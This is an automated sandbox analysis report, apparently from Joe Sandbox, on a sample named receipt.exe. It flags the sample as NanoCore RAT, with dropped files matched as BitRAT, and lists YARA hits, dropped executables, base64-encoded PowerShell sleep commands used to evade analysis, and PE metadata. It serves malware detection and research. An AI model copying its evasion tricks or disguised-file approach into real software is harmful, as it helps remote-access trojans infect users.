Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001A.00000002.601877963.0000000003223000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe, type: DROPPED Matched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe, type: DROPPED Matched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
Detected potential crypto function
Source: C:\Users\user\Desktop\receipt.exe Code function: 0_2_01688628 0_2_01688628
Source: C:\Users\user\Desktop\receipt.exe Code function: 0_2_01688065 0_2_01688065
Source: C:\Users\user\Desktop\receipt.exe Code function: 0_2_0168827D 0_2_0168827D
Source: C:\Users\user\Desktop\receipt.exe Code function: 12_2_014BC169 12_2_014BC169
Source: C:\Users\user\Desktop\receipt.exe Code function: 12_2_014B6001 12_2_014B6001
Source: C:\Users\user\Desktop\receipt.exe Code function: 12_2_056E6A60 12_2_056E6A60
PE file contains executable resources (Code or Archives)
Source: receipt.exe Static PE information: Resource name: RT_VERSION type: ARC archive data, packed
Source: Uewizrlgm.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARC archive data, packed
Source: Cfrstztdf.exe.12.dr Static PE information: Resource name: RT_VERSION type: ARC archive data, packed
Source: time[1].exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
Source: time[1].exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Source: time[1].exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
Source: time[1].exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
Source: time[1].exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
Source: time[1].exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
Source: time[1].exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Source: time[1].exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Source: uIyibZtq20fMk9Yx.exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
Source: uIyibZtq20fMk9Yx.exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Source: uIyibZtq20fMk9Yx.exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
Source: uIyibZtq20fMk9Yx.exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
Source: uIyibZtq20fMk9Yx.exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
Source: uIyibZtq20fMk9Yx.exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
Source: uIyibZtq20fMk9Yx.exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Source: uIyibZtq20fMk9Yx.exe.25.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Sample file is different than original file name gathered from version info
Source: receipt.exe, 00000000.00000002.346028348.00000000030C5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamethis.exe" vs receipt.exe
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOusxsxgejuvlhh.dll" vs receipt.exe
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs receipt.exe
Source: receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs receipt.exe
Source: receipt.exe, 00000000.00000002.345187251.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamethis.exe" vs receipt.exe
Source: receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs receipt.exe
Source: receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs receipt.exe
Source: receipt.exe, 0000000C.00000003.354725575.0000000004133000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameZaholeccyogx.dll" vs receipt.exe
Source: receipt.exe, 0000000C.00000002.524451344.000000000115A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs receipt.exe
Source: receipt.exe, 0000000C.00000000.343211523.00000000004E2000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenamethis.exe" vs receipt.exe
Source: receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs receipt.exe
Source: receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs receipt.exe
Source: receipt.exe, 0000000C.00000003.352308180.0000000003E96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameZaholeccyogx.dll" vs receipt.exe
Source: receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs receipt.exe
Source: receipt.exe, 0000001A.00000002.601877963.0000000003223000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameClientPlugin.dll4 vs receipt.exe
Source: receipt.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Uewizrlgm.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Cfrstztdf.exe.12.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\receipt.exe File read: C:\Users\user\Desktop\receipt.exe Jump to behavior
Source: receipt.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\receipt.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\receipt.exe "C:\Users\user\Desktop\receipt.exe"
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe "C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe "C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe"
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe "C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe"
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA== Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe "C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe" Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe File created: C:\Users\user\AppData\Roaming\Zyfrlcamp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qssrr0pi.tj1.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@27/22@4/1
Source: C:\Users\user\Desktop\receipt.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: receipt.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\receipt.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\receipt.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3596:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
Source: 26.0.receipt.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
Source: 26.0.receipt.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 26.0.receipt.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\receipt.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: receipt.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: receipt.exe Static file information: File size 1505280 > 1048576
Source: receipt.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: receipt.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x162800
